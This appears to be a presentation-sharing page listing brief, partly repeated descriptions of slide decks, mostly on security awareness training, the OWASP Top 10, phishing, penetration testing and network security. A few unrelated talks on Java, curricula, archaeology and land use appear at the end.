This document provides an overview of web security. It discusses how 30,000 websites are hacked every day using free hacking tools available online. It notes that SQL injection attacks on Sony led to a data breach of 77 million users. The document introduces OWASP and its top 10 web vulnerabilities. It provides details on the top vulnerability of injection flaws, how they occur, and ways to prevent them such as input validation and output encoding. Broken authentication and sensitive data exposure are also summarized as top vulnerabilities.
The document discusses various cybersecurity attack vectors and how organizations can protect themselves. It outlines common attack methods like ransomware, malicious code delivery, social engineering, and phishing. It then recommends that organizations conduct regular security audits, establish governance policies, create an incident response plan, and provide cybersecurity education to employees. The document promotes cybersecurity services from Future Point of View including vulnerability testing, forensics, and training to help organizations enhance their protections.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
This month, Community IT presents basic IT security training for end users. Learn about common threats and the best techniques for dealing with them. This webinar is intended for a broad audience of both technical and non-technical staff.
1) Employee training and awareness is a critical element for cybersecurity resilience. Successful programs focus on changing employee behavior and aligning security practices both inside and outside of work.
2) Traditional awareness programs often fail because they are not engaging for employees and do not lead to real behavior change. Effective programs treat security messaging like marketing and use multiple channels, contexts, and reminders to reinforce the message.
3) Measuring outcomes is important for security awareness programs. Objectives should be clearly defined and focused on discrete, measurable goals rather than vague concepts like "increasing awareness."
End users face common cybersecurity threats such as phishing attacks, ransomware, password reuse, using unpatched devices, lack of remote security, data leakage via social media, and disabling security controls. Key security measures for end users include setting administrator privileges, downloading and installing security updates, installing antivirus software, activating firewalls, using multi-factor authentication, and creating regular backups. Security awareness is important for end users to avoid risks to company assets from security lapses.
This document provides an overview and objectives for an information security awareness training. It covers topics like electronic communication, email viruses, phishing, internet usage, social networking, password management, and physical security. The training aims to help users understand cybersecurity threats, how to safely use technology, and their role in protecting company information assets. It emphasizes the importance of having strong, unique passwords and avoiding opening attachments or clicking links from unknown sources.
Cyber Security Awareness Training by Win-ProRonald Soh
This document provides an overview of cyber security awareness training. It defines cyber security as protecting internet-connected systems from cyberattacks. Information security aims to maintain confidentiality, integrity, and availability of data. Modern threats include viruses, worms, Trojans, logic bombs, rootkits, botnets, and social engineering. Social engineering manipulates people into revealing information or gaining access. The document provides best practices for strong passwords, protecting devices and information, identifying compromises, and reporting issues. It concludes with alerts on cyber security agencies and questions.
The document discusses various cybersecurity attack vectors and how organizations can protect themselves. It outlines common attack methods like ransomware, malicious code delivery, social engineering, and phishing. It then recommends that organizations conduct regular security audits, establish governance policies, create an incident response plan, and provide cybersecurity education to employees. The document promotes cybersecurity services from Future Point of View including vulnerability testing, forensics, and training to help organizations enhance their protections.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
This month, Community IT presents basic IT security training for end users. Learn about common threats and the best techniques for dealing with them. This webinar is intended for a broad audience of both technical and non-technical staff.
1) Employee training and awareness is a critical element for cybersecurity resilience. Successful programs focus on changing employee behavior and aligning security practices both inside and outside of work.
2) Traditional awareness programs often fail because they are not engaging for employees and do not lead to real behavior change. Effective programs treat security messaging like marketing and use multiple channels, contexts, and reminders to reinforce the message.
3) Measuring outcomes is important for security awareness programs. Objectives should be clearly defined and focused on discrete, measurable goals rather than vague concepts like "increasing awareness."
End users face common cybersecurity threats such as phishing attacks, ransomware, password reuse, using unpatched devices, lack of remote security, data leakage via social media, and disabling security controls. Key security measures for end users include setting administrator privileges, downloading and installing security updates, installing antivirus software, activating firewalls, using multi-factor authentication, and creating regular backups. Security awareness is important for end users to avoid risks to company assets from security lapses.
This document provides an overview and objectives for an information security awareness training. It covers topics like electronic communication, email viruses, phishing, internet usage, social networking, password management, and physical security. The training aims to help users understand cybersecurity threats, how to safely use technology, and their role in protecting company information assets. It emphasizes the importance of having strong, unique passwords and avoiding opening attachments or clicking links from unknown sources.
Cyber Security Awareness Training by Win-ProRonald Soh
This document provides an overview of cyber security awareness training. It defines cyber security as protecting internet-connected systems from cyberattacks. Information security aims to maintain confidentiality, integrity, and availability of data. Modern threats include viruses, worms, Trojans, logic bombs, rootkits, botnets, and social engineering. Social engineering manipulates people into revealing information or gaining access. The document provides best practices for strong passwords, protecting devices and information, identifying compromises, and reporting issues. It concludes with alerts on cyber security agencies and questions.
The document provides definitions and concepts related to application security including assets, threats, vulnerabilities, attacks, and security controls. It discusses how application security aims to secure the confidentiality, integrity, and availability of data by protecting against vulnerabilities like SQL injection and cross-site scripting. The document demonstrates how attackers can exploit vulnerabilities in multiple phases, from information gathering to maintaining access. It recommends best practices for developers like following security standards, conducting audits, implementing logging, and keeping software updated. Finally, it discusses Facebook's response to the Cambridge Analytica data privacy scandal.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
This document provides training on cybersecurity best practices for Borough of West Chester personnel. It defines cybersecurity as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. It outlines common cyber threats like viruses, worms, ransomware, and social engineering. It emphasizes using strong passwords, antivirus software, firewalls, and regular software updates. It also recommends avoiding malicious emails and websites, and backing up important data.
How To Learn The Network Security
Slide berikut merupakan slide yang berisikan dasar-dasar bagi kita dalam memahami konsep keamanan jaringan komputer, baik dari sisi inftrastruktur, teknologi dan paradigma bagi pengguna.
Materi yang diberikan sudah disusun oleh Pakar yang merupakan Trainer CEH dan memang berkompeten dibidang keamanan jaringan.
Slide ini saya dapatkan dari beliau saat mengikut training Certified Computer Security Officer (CCSO) dan Certified Computer Security Analyst (CCSA) dari beliau.
Semoga bermanfaat sebagai acuan bagi kita untuk belajar tentang keamanan jaringan komputer.
Terimakasih
As the industry’s first Secure Internet Gateway in the cloud, Cisco Umbrella provides the first line of defense against threats on the internet, protecting all your users within minutes.
Cisco Advanced Malware Protection offers global threat intelligence, advanced sandboxing and real-time malware blocking to prevent breaches while it continuously analyzes file activity across your network, so that you can quickly detect, contain and remove advanced malware.
Presentation of Cisco Security Architecture and Solutions such as Cisco Advanced Malware Protection (AMP) and Cisco Umbrella during Simplex-Cisco Technology Session that took place at the Londa Hotel in Limassol on 14 March 2018.
This document provides tips for safely using computers and the internet. It recommends keeping software updated, using antivirus software, firewalls, and strong passwords. It also suggests using private browsing, HTTPS, and ad blockers when surfing the internet. When using social media and email, it advises only giving permissions to trusted applications and being wary of unknown links or downloads. Basic tips for protecting identity and banking information are also included.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
This document provides an overview of information security awareness training from Mount Auburn Hospital. It covers protecting electronic protected health information at work and at home. Key points include understanding what PHI is and why security is important. It describes potential security threats like malware, social engineering, and data theft. Guidelines are provided for secure practices like strong passwords, email safety, and disposing of media properly. Tips for securing data at home involve using antivirus software, backups, and safe internet practices. The goal is to protect patient privacy and comply with HIPAA security requirements.
This document provides an overview of information technology security awareness training at Northern Virginia Community College. It aims to assist faculty and staff in safely using computing systems and data by understanding security threats and taking reasonable steps to prevent them. Everyone who uses a computer is responsible for security. New employees must complete training within 30 days, and refresher training is required annually. Users have personal responsibilities around reporting violations, securing devices and data, and safe email practices. Security violations can result in consequences like data loss, costs, and disciplinary action. Training must be documented and various delivery methods are outlined.
The document provides tips for keeping a network secure, including always keeping virus software and Windows updates enabled, using firewalls, backing up data regularly, and using strong passwords. It warns about common password risks like using obvious words or writing passwords down. The document also covers securing laptops, email, wireless networks, and avoiding risks from open networks. Proper authentication, surge protection, and password protecting are emphasized as important security best practices.
Phishing involves attempting to acquire sensitive information like usernames, passwords, and credit card details by masquerading as a trustworthy entity. Common phishing techniques include email spoofing and creating fake websites that look identical to legitimate ones. Phishing can be prevented by being wary of unsolicited requests for information, verifying website URLs, using security software, and reporting any suspicious activity.
This document provides an overview of an awareness training for executives on information security. It discusses:
1) Conducting a security assessment of the company's people, processes, and technology to understand current vulnerabilities. Assessments can be done internally or through a third party and usually take 90 days.
2) Expecting security threats to become more complex and widespread globally as web applications and hacker motivations evolve.
3) Tips for executives including conducting security assessments promptly and staying aware of the latest hacker techniques.
Here are the key advantages of a packet-filtering router firewall:
- Simple and fast - Packet filtering is a simple and fast operation as it only examines packet headers. This makes packet filtering routers suitable for high traffic networks.
- Low cost - Packet filtering routers are generally lower in cost compared to other firewall types as they utilize existing router hardware and software.
- Flexible rulesets - Packet filtering allows for flexible rulesets that can block or allow packets based on many header fields like source/destination IP, port, protocol type etc.
- Transparency - Packet filtering operates at the network/transport layers so it is transparent to users and applications.
- Performance - Packet filtering has minimal impact on network performance since
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Building An Information Security Awareness ProgramBill Gardner
Most organization’s Security Awareness Programs suck. They involved ‘canned’ video presentations or someone is HR explaining computer use policies. Others are extremely expensive and beyond the reach of the budgets of smaller organizations. This talk will show you how to build a Security Awareness Program from scratch for little or no money, and how to engage your users so that they get the most out of the program.
The document discusses Android security and provides an overview of key topics. It begins with Android basics and versions. It then covers the Android security model including application sandboxing and permissions. It defines Android applications and their components. It discusses debates on whether Android is more secure than iOS and outlines multiple layers of Android security. It also addresses Android malware, anti-virus effectiveness, rooting, application vulnerabilities, and security issues.
Employee Awareness in Cyber Security - KloudlearnKloudLearn
The goal of employee awareness in cybersecurity is to make employees aware of the procedures, policies, guidelines, and practices for configuring, managing, and executing cybersecurity in the organization.
Content:
What is phishing, history, how it works, statistics, types of phishing, how to identify it, how to take countermeasures, phishing kit, example of phishing attack.
Effective security awareness training with basic needs for the organization and its employees. It should also be engaging and interactive, using a variety of formats such as videos, quizzes, simulations, and case studies.
The OWASP Top Ten is an expert consensus of the most critical web application security threats. If properly understood, it is an invaluable framework to prioritize efforts and address flaws that expose your organization to attack.
This webcast series presents the OWASP Top 10 in an abridged format, interpreting the threats for you and providing actionable offensive and defensive best practices. It is ideal for all IT/development stakeholders that want to take a risk-based approach to Web application security.
How to Test for the OWASP Top Ten webcast focuses on tell tale markers of the OWASP Top Ten and techniques to hunt them down:
• Vulnerability anatomy – how they present themselves
• Analysis of vulnerability root cause and protection schemas
• Test procedures to validate susceptibility (or not) for each threat
The document provides definitions and concepts related to application security including assets, threats, vulnerabilities, attacks, and security controls. It discusses how application security aims to secure the confidentiality, integrity, and availability of data by protecting against vulnerabilities like SQL injection and cross-site scripting. The document demonstrates how attackers can exploit vulnerabilities in multiple phases, from information gathering to maintaining access. It recommends best practices for developers like following security standards, conducting audits, implementing logging, and keeping software updated. Finally, it discusses Facebook's response to the Cambridge Analytica data privacy scandal.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
This document provides training on cybersecurity best practices for Borough of West Chester personnel. It defines cybersecurity as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. It outlines common cyber threats like viruses, worms, ransomware, and social engineering. It emphasizes using strong passwords, antivirus software, firewalls, and regular software updates. It also recommends avoiding malicious emails and websites, and backing up important data.
How To Learn The Network Security
Slide berikut merupakan slide yang berisikan dasar-dasar bagi kita dalam memahami konsep keamanan jaringan komputer, baik dari sisi inftrastruktur, teknologi dan paradigma bagi pengguna.
Materi yang diberikan sudah disusun oleh Pakar yang merupakan Trainer CEH dan memang berkompeten dibidang keamanan jaringan.
Slide ini saya dapatkan dari beliau saat mengikut training Certified Computer Security Officer (CCSO) dan Certified Computer Security Analyst (CCSA) dari beliau.
Semoga bermanfaat sebagai acuan bagi kita untuk belajar tentang keamanan jaringan komputer.
Terimakasih
As the industry’s first Secure Internet Gateway in the cloud, Cisco Umbrella provides the first line of defense against threats on the internet, protecting all your users within minutes.
Cisco Advanced Malware Protection offers global threat intelligence, advanced sandboxing and real-time malware blocking to prevent breaches while it continuously analyzes file activity across your network, so that you can quickly detect, contain and remove advanced malware.
Presentation of Cisco Security Architecture and Solutions such as Cisco Advanced Malware Protection (AMP) and Cisco Umbrella during Simplex-Cisco Technology Session that took place at the Londa Hotel in Limassol on 14 March 2018.
This document provides tips for safely using computers and the internet. It recommends keeping software updated, using antivirus software, firewalls, and strong passwords. It also suggests using private browsing, HTTPS, and ad blockers when surfing the internet. When using social media and email, it advises only giving permissions to trusted applications and being wary of unknown links or downloads. Basic tips for protecting identity and banking information are also included.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
This document provides an overview of information security awareness training from Mount Auburn Hospital. It covers protecting electronic protected health information at work and at home. Key points include understanding what PHI is and why security is important. It describes potential security threats like malware, social engineering, and data theft. Guidelines are provided for secure practices like strong passwords, email safety, and disposing of media properly. Tips for securing data at home involve using antivirus software, backups, and safe internet practices. The goal is to protect patient privacy and comply with HIPAA security requirements.
This document provides an overview of information technology security awareness training at Northern Virginia Community College. It aims to assist faculty and staff in safely using computing systems and data by understanding security threats and taking reasonable steps to prevent them. Everyone who uses a computer is responsible for security. New employees must complete training within 30 days, and refresher training is required annually. Users have personal responsibilities around reporting violations, securing devices and data, and safe email practices. Security violations can result in consequences like data loss, costs, and disciplinary action. Training must be documented and various delivery methods are outlined.
The document provides tips for keeping a network secure, including always keeping virus software and Windows updates enabled, using firewalls, backing up data regularly, and using strong passwords. It warns about common password risks like using obvious words or writing passwords down. The document also covers securing laptops, email, wireless networks, and avoiding risks from open networks. Proper authentication, surge protection, and password protecting are emphasized as important security best practices.
Phishing involves attempting to acquire sensitive information like usernames, passwords, and credit card details by masquerading as a trustworthy entity. Common phishing techniques include email spoofing and creating fake websites that look identical to legitimate ones. Phishing can be prevented by being wary of unsolicited requests for information, verifying website URLs, using security software, and reporting any suspicious activity.
This document provides an overview of an awareness training for executives on information security. It discusses:
1) Conducting a security assessment of the company's people, processes, and technology to understand current vulnerabilities. Assessments can be done internally or through a third party and usually take 90 days.
2) Expecting security threats to become more complex and widespread globally as web applications and hacker motivations evolve.
3) Tips for executives including conducting security assessments promptly and staying aware of the latest hacker techniques.
Here are the key advantages of a packet-filtering router firewall:
- Simple and fast - Packet filtering is a simple and fast operation as it only examines packet headers. This makes packet filtering routers suitable for high traffic networks.
- Low cost - Packet filtering routers are generally lower in cost compared to other firewall types as they utilize existing router hardware and software.
- Flexible rulesets - Packet filtering allows for flexible rulesets that can block or allow packets based on many header fields like source/destination IP, port, protocol type etc.
- Transparency - Packet filtering operates at the network/transport layers so it is transparent to users and applications.
- Performance - Packet filtering has minimal impact on network performance since
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Building An Information Security Awareness ProgramBill Gardner
Most organization’s Security Awareness Programs suck. They involved ‘canned’ video presentations or someone is HR explaining computer use policies. Others are extremely expensive and beyond the reach of the budgets of smaller organizations. This talk will show you how to build a Security Awareness Program from scratch for little or no money, and how to engage your users so that they get the most out of the program.
The document discusses Android security and provides an overview of key topics. It begins with Android basics and versions. It then covers the Android security model including application sandboxing and permissions. It defines Android applications and their components. It discusses debates on whether Android is more secure than iOS and outlines multiple layers of Android security. It also addresses Android malware, anti-virus effectiveness, rooting, application vulnerabilities, and security issues.
Employee Awareness in Cyber Security - KloudlearnKloudLearn
The goal of employee awareness in cybersecurity is to make employees aware of the procedures, policies, guidelines, and practices for configuring, managing, and executing cybersecurity in the organization.
Content:
What is phishing, history, how it works, statistics, types of phishing, how to identify it, how to take countermeasures, phishing kit, example of phishing attack.
Effective security awareness training with basic needs for the organization and its employees. It should also be engaging and interactive, using a variety of formats such as videos, quizzes, simulations, and case studies.
The OWASP Top Ten is an expert consensus of the most critical web application security threats. If properly understood, it is an invaluable framework to prioritize efforts and address flaws that expose your organization to attack.
This webcast series presents the OWASP Top 10 in an abridged format, interpreting the threats for you and providing actionable offensive and defensive best practices. It is ideal for all IT/development stakeholders that want to take a risk-based approach to Web application security.
How to Test for the OWASP Top Ten webcast focuses on tell tale markers of the OWASP Top Ten and techniques to hunt them down:
• Vulnerability anatomy – how they present themselves
• Analysis of vulnerability root cause and protection schemas
• Test procedures to validate susceptibility (or not) for each threat
The document summarizes the top 10 security risks from the OWASP Top 10 - 2017 list. It describes each risk, including Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging & Monitoring. For each risk, it covers the potential impacts, how to detect flaws, and ways to prevent vulnerabilities. The document provides an overview of the most critical web application security risks.
A series of Cyber security lecture notes..........................
(Endpoint, Server, and Device Security), (Identity, Authentication, and Access Management)
(Data Protection and Cryptography)
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Michael Pirnat
This document provides an agenda for a session on exploiting and mitigating the top 1 web application vulnerabilities according to OWASP. The session will run from 9:00 AM to 12:20 PM with a 20 minute break at 10:50 AM and a lunch break from 12:20 PM to 1:20 PM. The session will discuss injection attacks, broken authentication and session management, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing function level access control, cross-site request forgery, using known vulnerable components, and unvalidated redirects and forwards. Prevention strategies and Django-specific advice will also be provided for each vulnerability.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
The document discusses computer security and common cyber attack vectors. It defines key terms like attack surface, attack vectors, and security breaches. It then describes 8 common attack vectors: compromised credentials, weak/stolen credentials, malicious insiders, missing/poor encryption, misconfiguration, ransomware, phishing, and trust relationships. Typical symptoms of an attack are also listed, such as slow performance, strange files/programs, and automatic messages. The consequences of a successful attack compromise the goals of computer security - confidentiality, integrity and availability.
Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling
Enterprise Information Security Architecture, Vulnerability
Assessment and Penetration Testing
Types of Social Engineering, Insider Attack, Preventing Insider
Threats, Social Engineering Targets and Defence Strategies
Talk on threats to database security. The title is, of course, deadly serious. Wile E. Coyote & other experts on correctness & security are enlisted to help make key points.
ETHICAL HACKING AND SOCIAL ENGINEERING
Topics Covered: Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling, Enterprise Information Security Architecture, Vulnerability, Assessment and Penetration Testing, Types of Social Engineering, Insider Attack, Preventing Insider Threats, Social Engineering Targets and Defence Strategies
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
Hacking involves identifying and exploiting weaknesses in computer systems to gain unauthorized access, while ethical hacking (also called penetration testing or white-hat hacking) involves using the same tools and techniques as hackers but legally and without causing damage. There are different types of hackers, including black hat hackers who use their skills maliciously, white hat hackers who use their skills defensively, and grey hat hackers whose behavior cannot be predicted. Ethical hacking is important for evaluating security and reporting vulnerabilities to owners.
Organizations are increasingly looking to their Internal Auditors to provide independent assurance about cyber risks and the organization's ability to defend against cyber attacks. With information technology becoming an inherent critical success factor for every business and the emerging cyber threat landscape, every internal auditor needs to equip themselves on IT audit essentials and cyber issues.
In part 12 of our Cyber Security Series you will learn about the current cyber risks and attack methods from Richard Cascarino, including:
Where are we now and Where are we going?
Current Cyberrisks
• Data Breach and Cloud Misconfigurations
• Insecure Application User Interface (API)
• The growing impact of AI and ML
• Malware Attack
• Single factor passwords
• Insider Threat
• Shadow IT Systems
• Crime, espionage and sabotage by rogue nation-states
• IoT
• CCPA and GDPR
• Cyber attacks on utilities and public infrastructure
• Shift in attack vectors
Secure Coding BSSN Semarang Material.pdfnanangAris1
This document provides an introduction to application security. It discusses why security is important and how applications can become vulnerable. It outlines common application security attacks like SQL injection, cross-site scripting, and denial-of-service attacks. It also discusses software security standards, models and frameworks like OWASP that can help make applications more secure. The document emphasizes the importance of secure coding practices and security testing to prevent vulnerabilities.
IBM i is securable BUT not secured by default. To help protect your organization from the increasing security threats, you must take control of all access points to your IBM i server. You can limit IBM i security threats by routinely assessing your risks and taking control of logon security, powerful authorities, and system access.
With the right tools and process, you can assure comprehensive control of unauthorized access and can trace any activity, suspicious or otherwise, on your IBM i systems.
Watch this on-demand webcast to learn:
• How to secure network access and communication ports
• How to implement different authentication options and tradeoffs
• How to limit the number of privileged user accounts
• How Precisely’s Assure Security can help
owasp features in secure coding techniquesSri Latha
The document outlines the top 10 vulnerabilities according to OWASP: 1) Injection, 2) Broken Authentication & Session Management, 3) Sensitive Data Exposure, 4) XML External Entities, 5) Broken Access Control, 6) Security Misconfiguration, 7) Cross-Site Scripting, 8) Insecure Deserialization, 9) Using Components with Known Vulnerabilities, and 10) Insufficient Logging & Monitoring. Each vulnerability is briefly described, with Injection being the most common issue that allows hostile data to execute unintended commands. Broken Authentication, Sensitive Data Exposure, and Cross-Site Scripting are also major risks. Proper logging and monitoring is important to detect attacks.
Covers security and privacy issues for software product developers including attacks and defenses, encryption, authentication, authorisation and data protection
Expand Your Control of Access to IBM i Systems and DataPrecisely
This document discusses expanding control of access to IBM i systems and data. It begins with some logistical information about the webcast. The presentation will discuss myths about IBM i security, exit points and access methods, examples of security issues, and how Syncsort can help with security. The agenda includes discussing the myth that IBM i is secure by nature, reviewing exit points and access methods, providing examples, and explaining how Syncsort can help manage security risks. Overall, the document aims to educate about security risks on IBM i and how third party solutions can help address vulnerabilities from various access methods and improve overall security.
Guest lecture on web application security, presented to students at the Indianapolis campus of The Iron Yard on November 9, 2016. This presentation was a basic overview/introduction to security, discussed the CIA Triad, why security is difficult, what happens if we don't do security right, what developers can do to enhance security, and included a brief overview of the OWASP Top Ten.
Ringkasan dokumen tersebut adalah perbandingan kurikulum 2016 dan 2020 serta persiapan kuliah daring untuk program D3 TK. Dokumen tersebut membahas perbedaan kurikulum, tabel ekuivalensi mata kuliah, dan skenario registrasi mahasiswa angkatan 2018 dan 2019 berdasarkan kurikulum baru.
This document provides an introduction and overview of the Diploma of Computer Engineering program at Telkom University. It discusses the history and profile of graduates from the program, which includes careers in fields like network engineering, hardware engineering, and entrepreneurship. It also outlines the curriculum, requirements to graduate, available laboratories and research groups, student achievements in competitions, and links to additional online resources.
Dokumen ini memberikan informasi tentang Capture The Flag (CTF) pada situs ctf.live. CTF digunakan untuk mempelajari keamanan jaringan melalui tantangan seperti mencari flag pada server target menggunakan perintah seperti Nmap dan SSH. Peserta harus mendaftar, memilih tingkat kesulitan, menjalankan server, mencari IP target, mengumpulkan flag, dan melaporkan langkah pengerjaannya.
1. Dokumen tersebut membahas tentang keamanan jaringan nirkabel dan aplikasi web. Termasuk teknik hacking wifi, enkripsi nirkabel, dan serangan terhadap server dan aplikasi web seperti injection, XSS, dan cara mencegahnya.
Dokumen ini membahas tentang teknik-teknik untuk mendapatkan akses ke sistem target setelah melakukan footprinting dan scanning. Beberapa teknik yang disebutkan antara lain cracking password, social engineering, dan mengeksekusi aplikasi untuk mendapatkan akses ke sistem target. Dokumen ini juga membahas berbagai cara untuk memperkuat keamanan password agar sulit diretas.
Mata kuliah ini membahas konsep dasar keamanan jaringan, termasuk aspek-aspek keamanan seperti kerahasiaan, integritas, dan ketersediaan data. Mahasiswa akan mempelajari teknik serangan dan pertahanan jaringan, serta membangun sistem pertahanan jaringan.
Dokumen ini membahas tentang remastering distro Linux dimana mahasiswa diminta untuk memilih sebuah tema dan merubah tampilan serta paket aplikasi sebuah distro Linux sesuai dengan tema tersebut. Mahasiswa harus menyertakan laporan dan presentasi hasil remastering mereka serta akan dinilai berdasarkan tampilan distro, dokumentasi, dan presentasi. Beberapa tools yang dapat digunakan untuk remastering antara lain Linux Respin, Linux Live Kit, Ubuntu Imager, dan M
Dokumen tersebut merupakan modul mata kuliah Sistem Operasi yang mencakup informasi tentang mata kuliah tersebut seperti kode mata kuliah, kredit, prasyarat, dosen pengampu, aturan perkuliahan, materi pertemuan, aturan praktikum, aturan penilaian, dan referensi.
IDS dan IPS digunakan untuk mendeteksi dan mencegah insiden keamanan jaringan. IDS hanya melakukan deteksi dan pelaporan insiden, sementara IPS dapat melakukan deteksi dan juga menghentikan insiden dengan cara memblokir akses. Metode deteksi yang digunakan antara lain berbasis signature dan berbasis anomalis untuk mendeteksi pola serangan yang dikenal maupun perilaku yang tidak normal. Contoh produk IPS komersial adalah Cisco FirePower, HP NGIPS,
Main Java[All of the Base Concepts}.docxadhitya5119
This is part 1 of my Java Learning Journey. This Contains Custom methods, classes, constructors, packages, multithreading , try- catch block, finally block and more.
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) CurriculumMJDuyan
(𝐓𝐋𝐄 𝟏𝟎𝟎) (𝐋𝐞𝐬𝐬𝐨𝐧 𝟏)-𝐏𝐫𝐞𝐥𝐢𝐦𝐬
𝐃𝐢𝐬𝐜𝐮𝐬𝐬 𝐭𝐡𝐞 𝐄𝐏𝐏 𝐂𝐮𝐫𝐫𝐢𝐜𝐮𝐥𝐮𝐦 𝐢𝐧 𝐭𝐡𝐞 𝐏𝐡𝐢𝐥𝐢𝐩𝐩𝐢𝐧𝐞𝐬:
- Understand the goals and objectives of the Edukasyong Pantahanan at Pangkabuhayan (EPP) curriculum, recognizing its importance in fostering practical life skills and values among students. Students will also be able to identify the key components and subjects covered, such as agriculture, home economics, industrial arts, and information and communication technology.
𝐄𝐱𝐩𝐥𝐚𝐢𝐧 𝐭𝐡𝐞 𝐍𝐚𝐭𝐮𝐫𝐞 𝐚𝐧𝐝 𝐒𝐜𝐨𝐩𝐞 𝐨𝐟 𝐚𝐧 𝐄𝐧𝐭𝐫𝐞𝐩𝐫𝐞𝐧𝐞𝐮𝐫:
-Define entrepreneurship, distinguishing it from general business activities by emphasizing its focus on innovation, risk-taking, and value creation. Students will describe the characteristics and traits of successful entrepreneurs, including their roles and responsibilities, and discuss the broader economic and social impacts of entrepreneurial activities on both local and global scales.
Leveraging Generative AI to Drive Nonprofit InnovationTechSoup
In this webinar, participants learned how to utilize Generative AI to streamline operations and elevate member engagement. Amazon Web Service experts provided a customer specific use cases and dived into low/no-code tools that are quick and easy to deploy through Amazon Web Service (AWS.)
How to Make a Field Mandatory in Odoo 17Celine George
In Odoo, making a field required can be done through both Python code and XML views. When you set the required attribute to True in Python code, it makes the field required across all views where it's used. Conversely, when you set the required attribute in XML views, it makes the field required only in the context of that particular view.
Temple of Asclepius in Thrace. Excavation resultsKrassimira Luka
The temple and the sanctuary around were dedicated to Asklepios Zmidrenus. This name has been known since 1875 when an inscription dedicated to him was discovered in Rome. The inscription is dated in 227 AD and was left by soldiers originating from the city of Philippopolis (modern Plovdiv).
LAND USE LAND COVER AND NDVI OF MIRZAPUR DISTRICT, UPRAHUL
This Dissertation explores the particular circumstances of Mirzapur, a region located in the
core of India. Mirzapur, with its varied terrains and abundant biodiversity, offers an optimal
environment for investigating the changes in vegetation cover dynamics. Our study utilizes
advanced technologies such as GIS (Geographic Information Systems) and Remote sensing to
analyze the transformations that have taken place over the course of a decade.
The complex relationship between human activities and the environment has been the focus
of extensive research and worry. As the global community grapples with swift urbanization,
population expansion, and economic progress, the effects on natural ecosystems are becoming
